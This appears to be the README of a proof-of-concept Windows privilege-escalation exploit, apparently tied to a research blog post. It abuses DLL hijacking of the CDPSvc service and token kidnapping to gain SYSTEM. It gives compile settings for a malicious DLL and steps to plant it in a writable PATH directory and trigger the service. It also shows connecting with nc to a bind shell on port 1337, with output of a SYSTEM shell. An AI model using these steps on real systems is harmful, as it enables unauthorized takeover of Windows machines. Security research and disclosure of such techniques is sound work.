CDPSvc DLL Hijacking - From LOCAL SERVICE to SYSTEM
Description
For more information please visit this blog post.
/!\ This technique works only if the target machine has less than 3.5GB of RAM! Otherwise each service runs in a separate process and the Token Kidnapping technique is therefore useless.
How to compile
- Open Visual Studio and create a new C++ Console Application project.
- Replace the content of the main source file with the content of cdpsgshims.cpp.
- Select Release and x86/x64 depending on the architecture of the target machine.
- Open Project > Properties (and make sure the selected platform - Win32/x64 - is correct)
- General > Configuration Type ->
Dynamic Library (.dll)
- C/C++ > Code Generation > Runtime Library ->
Multithread (/MT)
- General > Configuration Type ->
- Build solution
Usage
- Rename the output file as cdpsgshims.dll.
- Copy it into a PATH directory where you have Write access.
- Reboot (or stop/start CDPSvc as an administrator).
- Use a tool such as
nc.exe
to connect to the local port 1337.
C:\TOOLS\>nc64.exe 127.0.0.1 1337
[*] Searching for a SYSTEM token...
[+] SYSTEM token found.
[+] CreateProcessAsUser() OK
Microsoft Windows [version 10.0.18362.476]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
nt auhtority\system
/!\ At this point, I'd suggest to stop the service, delete the DLL and restart the service. Otherwise you won't be able to delete the file. Your shell won't die because it runs in a separate process.